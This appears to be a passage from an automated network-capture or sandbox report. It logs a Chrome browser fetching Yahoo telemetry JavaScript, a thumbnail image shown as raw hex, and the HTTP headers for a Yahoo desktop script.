                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 5f 74 79 70 65 6f 66 28 65 29 7b 72 65 74 75 72 6e 20 5f 74 79 70 65 6f 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 5f 74 79 70 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_type
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 77 2e 77 61 66 65 72 2c 73 3d 21 28 21 77 69 6e 64 6f 77 2e 77 61 66 65 72 7c 7c 21 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 61 64 79 29 2c 67 3d 22 22 2e 63 6f 6e 63 61 74 28 22 2f 5f 74 64 5f 61 70 69 2f 62 65 61 63 6f 6e 22 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 69 29 2e 63 6f 6e 63 61 74 28 75 28 29 2c 22 26 73 69 74 65 3d 22 29 2e 63 6f 6e 63 61 74 28 66 2e 73 69 74 65 2c 22 26 63 6f 6e 6e 65 63 74 69 6f 6e 3d 22 29 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 77 28 29 29 29 2c 22 26 68 61 73 57 66 3d 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 68 61 73 57 66 52 3d 22 29 2e 63 6f 6e 63 61 74 28 73 29 3b 76 28 67 29 2c 72 2e 5f 5f 74 65 73 74 45 72 72 6f 72 26 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: w.wafer,s=!(!window.wafer||!window.wafer.ready),g="".concat("/_td_api/beacon","/").concat(e,"?").concat(i).concat(u(),"&site=").concat(f.site,"&connection=").concat(escape(JSON.stringify(w())),"&hasWf=").concat(c,"&hasWfR=").concat(s);v(g),r.__testError&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 28 64 3e 33 29 26 26 28 21 72 2e 6e 61 76 69 67 61 74 6f 72 7c 7c 21 31 21 3d 3d 72 2e 6e 61 76 69 67 61 74 6f 72 2e 6f 6e 4c 69 6e 65 29 26 26 65 29 7b 76 61 72 20 6e 3d 65 2e 6d 65 74 61 2c 74 3d 65 2e 6e 61 6d 65 2c 6f 3d 65 2e 73 74 61 63 6b 2c 61 3d 6f 26 26 6f 2e 6d 65 73 73 61 67 65 7c 7c 6f 7c 7c 22 22 2c 69 3d 22 2f 22 2e 63 6f 6e 63 61 74 28 66 2e 62 65 61 63 6f 6e 50 61 74 68 2c 22 3f 65 72 72 3d 22 29 2e 63 6f 6e 63 61 74 28 74 2c 22 26 62 65 61 63 6f 6e 54 79 70 65 3d 77 61 66 65 72 5f 65 72 72 26 69 6e 66 6f 3d 22 29 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6e 29 29 2c 22 26 73 74 61 63 6b 3d 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: },m=function(e){if(!(d>3)&&(!r.navigator||!1!==r.navigator.onLine)&&e){var n=e.meta,t=e.name,o=e.stack,a=o&&o.message||o||"",i="/".concat(f.beaconPath,"?err=").concat(t,"&beaconType=wafer_err&info=").concat(escape(JSON.stringify(n)),"&stack=").concat(a,"&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC349INData Raw: 63 65 73 43 72 65 61 74 6f 72 3b 72 2e 59 41 48 4f 4f 2e 75 74 69 6c 73 2e 74 72 61 63 65 73 3d 6e 2e 63 72 65 61 74 65 54 72 61 63 65 73 49 6e 73 74 61 6e 63 65 28 7b 74 72 61 63 65 73 3a 7b 67 6c 6f 62 61 6c 41 74 74 72 69 62 75 74 65 73 3a 7b 61 75 74 68 65 64 3a 4f 2e 61 75 74 68 65 64 7c 7c 22 30 22 2c 62 75 63 6b 65 74 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 41 29 26 26 41 2e 6a 6f 69 6e 28 22 2c 22 29 7c 7c 41 2c 63 6f 6e 6e 65 63 74 3a 22 22 2e 63 6f 6e 63 61 74 28 65 73 63 61 70 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 77 28 29 29 29 29 2e 63 6f 6e 63 61 74 28 75 28 29 29 2c 64 65 76 69 63 65 3a 4f 2e 64 65 76 69 63 65 2c 65 6e 76 3a 4f 2e 65 6e 76 7c 7c 22 70 72 6f 64 75 63 74 69 6f 6e 22 2c 6c 61 6e 67 3a 4f 2e 6c 61 6e 67 2c 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: cesCreator;r.YAHOO.utils.traces=n.createTracesInstance({traces:{globalAttributes:{authed:O.authed||"0",bucket:Array.isArray(A)&&A.join(",")||A,connect:"".concat(escape(JSON.stringify(w()))).concat(u()),device:O.device,env:O.env||"production",lang:O.lang,r


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              63192.168.2.45108587.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC530OUTGET /uu/api/res/1.2/9DG6AgnOJ2KdSpjKQ9t4uw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/21b5e300-8579-11ef-beaf-01118c908edd.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="21b5e300-8579-11ef-beaf-01118c908edd.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "1f71cfe00839cdd1962827e846d89935"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expiration: expiry-date="Mon, 07 Apr 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 13:50:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 15:44:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-10-08T15:44:39.675Z;desc=hit,rtt;dur=105,content-info;desc="width=356,height=180,bytes=7748,owidth=3671,oheight=2068,obytes=720206,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: 3eb990e2c2d927cd6cc33399c9d8c55d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 12537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: 3eb990e2c2d927cd6cc33399c9d8c55d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 180
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 19862
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 00 b4 01 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 01 06 07 08 09 ff c4 00 50 10 00 01 03 03 02 03 05 06 02 07 03 07 08 0b 00 00 01 02 03 04 00 05 11 06 12 07 21 31 08 13 41 51 61 14 22 32 71 81 91 42 a1 15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: JFIFCCdP!1AQa"2qB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 83 eb 3f 48 61 f9 19 c8 f2 6b ab 2b 59 51 af 90 4a 4f db aa a6 14 1e da ec ee c7 71 c2 4b 11 2a cf 7a 1f 74 72 fc 2a 79 78 fe 15 f7 dd 2d 46 25 27 e1 9f ab 1c f5 2b 87 4a 1c 81 35 de 7c ad 42 1c 73 27 02 ac 94 2d 34 1a 99 a0 ca 18 50 6a 19 1e 74 49 94 30 c8 f3 a5 28 d4 52 53 ba 89 46 7a 58 14 03 8a 4d a3 65 4b 63 89 8e 55 d3 ad 4b a9 20 54 31 c4 41 7f f7 07 de a7 b8 8d a9 b6 d7 a1 c1 05 ee 9b 29 3b 8a 39 1b a1 fc 12 6d ef 13 90 9e 95 9f 71 7d 32 d2 fe 02 ad 13 55 d2 23 a3 fd c2 7f 85 69 4d 69 f2 c9 d0 c6 95 63 bb 0c 62 dd 20 fc 9a 51 fe 55 5a e9 fa 3d 15 7c 14 dd 82 ee b3 ce db 28 7f f4 55 52 ee 53 f4 74 d0 e7 82 c1 1a 47 50 91 ee 58 ee 07 cf fb 2a ff 00 a5 4b ae 96 b9 3a 69 b6 df a1 c5 f0 fb 5a be 76 c6 d2 77 87 55 fb a8 82 e1 3f c2 b0 79 4a d3 dd 9d 16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ?Hak+YQJOqK*ztr*yx-F%'+J5|Bs'-4PjtI0(RSFzXMeKcUK T1A);9mq}2U#iMicb QUZ=|(URStGPX*K:iZvwU?yJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 51 33 b1 e9 5c ad 3a 59 f5 97 81 dd ac 78 ad a7 b5 ee 88 ec f9 c4 5e 16 5b e0 29 56 e8 10 1a 72 1b ca 2e a2 3f b3 a7 bb 78 fb cb 42 93 b0 64 ed 23 e1 50 27 22 bd 7b 58 f3 6b 51 f9 0e 5b 4a ed 7f f9 3d 61 c4 9e 2c 68 ee 14 69 d5 ea 5d 67 70 f6 76 0a c3 51 d9 6c 6f 7e 53 a7 a3 4d 20 73 5a cf 80 e9 e2 48 19 22 55 b6 cc 25 1c 1e d5 da bb 8a 17 0e 3a 69 3e 15 5d b8 65 6e b0 b3 a9 1a 4c e0 cc b7 dc 72 7c 78 6a 0e a8 29 c0 08 4b 6e 6d 65 4a 28 20 90 08 e7 5a f6 36 91 c9 d7 b8 ef c6 cb 67 06 34 52 ef ae 45 f6 fb c4 d5 fb 25 9a d8 92 77 cd 94 af 85 20 27 de da 9c e5 44 78 60 75 50 ac d5 b7 21 27 36 ec 9f da be e3 c7 49 77 bd 3d ac ed b6 eb 6d ee de 13 29 86 e1 a5 68 43 8c 7c 2b 05 2b 52 8e e4 2f 68 eb d1 63 cb 9e b7 f1 21 28 09 36 1d 7f c6 fd 49 70 e2 dd a7 82 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Q3\:Yx^[)Vr.?xBd#P'"{XkQ[J=a,hi]gpvQlo~SM sZH"U%:i>]enLr|xj)KnmeJ( Z6g4RE%w 'Dx`uP!'6Iw=m)hC|++R/hc!(6Ip|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 49 c8 ee 57 91 fc 0d 7a 0e b9 ed 4f a9 38 9c 8e 31 5e f8 05 2e ff 00 29 b4 a4 d8 62 5c 1a 70 45 b4 b6 ac 14 a9 96 f2 9c ab 07 e2 57 3c 92 79 1c 63 d4 f1 69 89 93 c8 86 89 9c 28 e2 36 b9 d6 3d ba ad 77 ae 29 69 f8 fa 7e f6 d5 ad e4 2a dc d9 20 34 91 05 cd 8a 19 2a ea 95 67 19 ea a3 59 e8 7d a8 f6 4e a3 a8 e8 2d 46 8e d1 5d a7 ef 7c 48 b8 3a b7 b4 af 0d 4a ed f6 46 f1 96 dd 9a 49 cb c0 74 24 90 a5 e7 1c bf 55 e5 8a 8e d6 94 1a 99 c6 38 fe f5 ff 00 b2 a7 69 56 38 b1 a2 a3 b6 6d 97 d5 b9 39 a6 14 af d4 af 7e 44 96 15 8f 0d c4 2c 60 60 07 11 e2 2b 45 43 bd b3 25 d6 7a 57 b1 bd 92 4d af 42 48 e2 9e a8 59 91 a9 f5 f3 e6 ed 2e 42 c7 bc 19 24 f7 49 f3 1d 54 ac 79 2c 0e 58 c5 67 95 43 4b 60 ee 33 55 ed 23 ab 64 71 9f 8d 5a 4b b3 6d b6 63 c9 b4 c7 70 5e b5 13 88 e5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: IWzO81^.)b\pEW<yci(6=w)i~* 4*gY}N-F]|H:JFIt$U8iV8m9~D,``+EC%zWMBHY.B$ITy,XgCK`3U#dqZKmcp^
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 1a d7 22 ab aa 5e aa cf 65 d5 fe 27 60 d2 dd b3 b8 ed a6 9c 6b da 35 23 57 76 59 23 6b 73 98 4a 95 b4 78 15 a7 04 fc cf 3a e9 55 c1 e2 bb 7a 8d e3 4f 76 aa e1 f5 c3 57 27 5e 6b 2e 15 a1 8d 42 e2 76 2a ed 06 49 53 a5 3d d9 6c 80 95 90 07 b8 4a 7e 2e 86 b7 59 50 4b b0 75 8e 15 f1 cf 80 f6 08 4e 5a f4 3c 88 5a 75 99 cf 19 2e b0 e2 54 ca 56 ee 00 2a 2a 5f 2c e0 0f c4 6b a7 c9 59 07 35 48 da 6f 1a f3 85 7c 53 65 56 bb ec 6b 76 a2 6e d4 f8 73 bb 90 c1 5a 1a 59 04 05 24 a8 60 e4 05 73 1c b9 57 4d 34 a4 b9 25 a6 89 7a 3f 8f fc 3f b9 30 fe 9f d1 b7 86 5e 6e c1 b2 23 b1 d9 dc 13 19 38 21 b4 8c a4 0c 61 04 72 24 72 eb 56 e8 93 37 52 29 74 d7 16 78 43 7b d6 77 8b 8e 8f 45 a5 cd 47 1c 25 ab 9c e6 23 14 c8 50 27 92 4b aa 19 5a 72 81 d0 90 30 9e 7e 62 b3 1c 12 ae 21 bb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "^e'`k5#WvY#ksJx:UzOvW'^k.Bv*IS=lJ~.YPKuNZ<Zu.TV**_,kY5Ho|SeVkvnsZY$`sWM4%z??0^n#8!ar$rV7R)txC{wEG%#P'KZr0~b!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC264INData Raw: 9f ce bc dc 9e 93 7d 6f 07 4a ea 76 5f b3 5a bd 5b 6e 6d 94 37 21 b7 19 44 76 92 cf b3 a1 be e5 cc 0f 1c af aa 89 24 95 67 39 3c b0 00 15 e7 76 ea a7 68 3b a9 ad 55 c1 09 81 28 ce 44 58 91 64 32 b2 a0 86 9a 73 dd de a3 eb d0 01 e2 4f 85 66 d4 1a c1 6a cd f1 76 d9 cf c6 90 b4 bc cb 6a da 0a 15 b8 9f 50 7f 10 ac c8 a9 b3 60 b6 de ac 37 41 dd c6 bc 47 4b fe 2d 38 76 9a de de c4 3a 64 da 6d 1a 83 59 69 c7 92 ed a2 fb 31 84 a7 98 0c ba 52 9f ca b7 a6 a6 3d 0a 0d 97 4c 71 82 7e 95 96 fb f2 34 95 96 40 98 52 5f 5b 50 d3 1c ab 6e 70 55 dc 6c 2a 3e f1 e6 a2 6b ad 66 5c a7 93 95 e1 db ab 82 cb 87 ba b7 83 7a 6a 55 ce 6c 4b 85 f6 d6 fd cf 6a e4 07 07 b5 7b c9 dd ee 21 29 09 20 12 b5 1c a8 9c 79 d6 94 f5 05 4f fb 19 d7 80 df fa 96 5c 1d b1 c4 bb 6b ed 49 a9 ac da 9e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: }oJv_Z[nm7!Dv$g9<vh;U(DXd2sOfjvjP`7AGK-8v:dmYi1R=Lq~4@R_[PnpUl*>kf\zjUlKj{!) yO\kI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 19 ed ab 73 79 07 70 28 fc 20 72 59 3e 95 b5 3d 52 c7 b4 72 78 b7 e9 70 5e 70 b3 85 da af 45 df 35 1c 9b d3 0c 2e 75 d1 dc 0f 66 74 3c a2 41 51 2a 21 39 3c f7 0e 55 e8 2c ab 10 3c 85 7d 2d c3 84 3c 3b d4 1a 06 6d fe 65 de 53 3e d3 74 7c 2d 1d d8 27 68 ca cf 3c e3 9f bd d2 87 a5 ef 27 02 55 7b 3a d3 32 64 2c 7e d3 18 a3 52 34 a6 4d 23 83 5c 24 b9 f0 fe fd a9 2f b7 2b a4 77 dd bd ba 95 36 96 5b 57 ba de e5 2b 99 38 e6 77 0e 9e 5d 6a 2a 68 da 99 47 5f 7a 2f b6 42 93 13 bd 53 7d fb 4a 6f 7a 4f 34 e4 63 35 95 46 e8 e6 dc 30 e0 1c ad 13 a5 b5 35 89 ed 40 89 32 b5 11 5a 0b e8 61 4d a1 b4 14 29 23 39 27 76 0a d4 7c 2b 17 5c 32 d0 69 5e cd 53 ec bc 18 bd f0 d9 5a 95 a5 c9 be 3e 5f 54 d0 c9 d8 d9 ca 30 36 95 67 a2 00 cf 2e a4 e3 c2 a5 e4 24 34 8d 8e cb d9 d1 09 e1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: syp( rY>=Rrxp^pE5.uft<AQ*!9<U,<}-<;meS>t|-'h<'U{:2d,~R4M#\$/+w6[W+8w]j*hG_z/BS}JozO4c5F05@2ZaM)#9'v|+\2i^SZ>_T06g.$4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 4a 9f 65 6e 37 36 22 f0 49 2d 3a 14 92 ae 83 dd 5a f1 e5 8a 35 b5 c9 3a 13 3d b7 c3 cb 07 09 f8 eb a6 d5 ac 78 33 70 d5 4e db 10 e8 64 47 65 d8 b2 1f 8c a3 81 87 d9 7c 21 60 1e 64 6d 75 79 03 91 c8 20 74 79 6d 7b 39 fc 4a 59 36 e7 c0 cd 6b 64 6d 4e c7 bf d9 25 37 fb 42 e5 c6 2c ab 47 74 3f 74 bb b5 e6 d6 47 a1 02 a9 66 b2 5e 2a 22 af 4b eb 58 11 84 a9 ba 32 e2 fc 5c 73 97 6b 5b 57 16 0e 3a ed ee 16 a7 08 f9 b6 3e 95 aa ca 92 7c 78 19 63 51 e9 58 8e 8b 7d c6 e4 c5 be 4f fe ef 70 26 23 ff 00 f5 4e 84 a8 7d 45 15 5c 91 76 da 36 db 6b 6d 3e 01 8c b4 29 0a 1f 10 39 18 ae 77 50 fb 6c d9 61 da 26 c6 79 e9 2c da de 98 c3 db 4a 94 d2 92 14 85 0c e4 90 a2 32 3f 86 2a 1d 48 d2 9a 19 b1 c0 d3 d3 2e 4b 5c 87 54 fd b8 24 36 84 fb 88 52 d5 b5 40 a8 1c ee 00 10 31 e7 85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Jen76"I-:Z5:=x3pNdGe|!`dmuy tym{9JY6kdmN%7B,Gt?tGf^*"KX2\sk[W:>|xcQX}Op&#N}E\v6km>)9wPla&y,J2?*H.K\T$6R@1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 0c cb e4 54 4f b6 ea 18 d2 d9 1f 8e 28 69 68 ff 00 10 04 1a d9 b8 23 4c 97 87 56 dc d4 02 1c b8 a8 ef 50 4f c0 9e 5f 95 29 1e 92 5a 6f f3 c8 da 9b a7 bc 7a 02 84 8c fe 55 40 90 a3 32 f8 48 cc f4 7d 93 fd 28 13 aa 06 d5 22 f2 8f fd a9 07 3f bc 9c d0 26 a0 81 26 eb 74 42 b0 e3 51 d7 8f 10 8a 68 45 4c fb f3 63 29 99 19 48 03 a7 3e 59 ad 10 69 35 4b ad c9 0a 5a 93 14 21 28 5f e2 4a d4 ac fd 08 e5 f4 e7 56 27 b1 a8 48 19 79 47 34 19 ca f8 79 1c ad c2 72 95 62 be c1 28 3e 4c 48 0e 1f 89 59 a0 a4 a4 73 69 ce 6a c9 15 83 e7 40 0e a7 e7 50 59 9f ad 12 03 b9 14 49 65 65 cc 07 a6 c3 8a f4 e6 e1 b2 f9 29 2f 39 9d a8 57 2c 13 8e 7d 4f d2 b9 6f 5e 74 9d 78 d4 95 3a 8a c7 7e b0 bc d2 1c 6c 06 9d 70 14 be 83 b9 b7 9a f1 29 50 e4 6b 9d 5f 55 9d 75 45 28 8c dc 95 14 81 8a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: TO(ih#LVPO_)ZozU@2H}("?&&tBQhELc)H>Yi5KZ!(_JV'HyG4yrb(>LHYsij@PYIee)/9W,}Oo^tx:~lp)Pk_UuE(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 49 f1 3d 07 23 92 7c 2b 4a 2f ec 6a e8 35 27 56 b6 d6 5b 75 a5 36 b4 f2 52 54 30 45 68 ee 49 0e 9f a3 0c fe a7 77 bc b5 6e 56 ef 78 e7 1e 83 d2 b3 aa b6 25 48 ef 7f 8f 3f bd 4e a6 5a a0 3b ff 00 9f de 85 53 45 c1 8f 6a 28 3e ef 8f ad 5a ba 43 a2 47 53 2d ce b9 a7 df 43 a6 d8 bf 6e 58 eb d0 53 ef 20 d0 8c 7e 92 6f fd 60 a5 de 16 80 fd 24 8f df a4 ef 0a 9a 3e 88 fd 24 9f df 15 0e f1 6a da 3b 6f 65 7d 17 62 d6 1a d9 57 ed 5a c2 1f b4 d9 02 57 ec eb 50 da fb ea 27 62 54 0f 54 8c 6e 3e 7c 87 8d 3c 8b 9f b3 b0 92 49 ee 7d 0f 8b c4 8b 4b 6d 21 96 df 69 08 69 21 29 4a 40 00 01 5e 13 a1 be 4e eb 6d 24 58 c5 e2 15 ba 53 7b da 96 0e 3a 8f 2a 55 5b d8 d9 32 c9 5a e2 08 60 38 5e 07 07 1d 6b 9d d0 cd 53 42 86 b5 b7 91 9e fc 7d e9 69 62 94 86 e6 6b fb 3d be 39 95 2e 56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: I=#|+J/j5'V[u6RT0EhIwnVx%H?NZ;SEj(>ZCGS-CnXS ~o`$>$j;oe}bWZWP'bTTn>|<I}Km!ii!)J@^Nm$XS{:*U[2Z`8^kSB}ibk=9.V


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              64192.168.2.45108487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC563OUTGET /aaq/scp/js/fpDesktop.46ec7cd52ee9f5c1236b0dea5072690a.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: BhEr6wN9+Xj2BuiKmE0ZAvOFklNuoOD3LmFVJ/rQtXceQ5ma9g4POiiDaHzMtSclCSuAT/G+yo0=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 2X28R1DJDHAEFPZS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 18:59:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 17 Sep 2024 14:42:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "46ec7cd52ee9f5c1236b0dea5072690a"
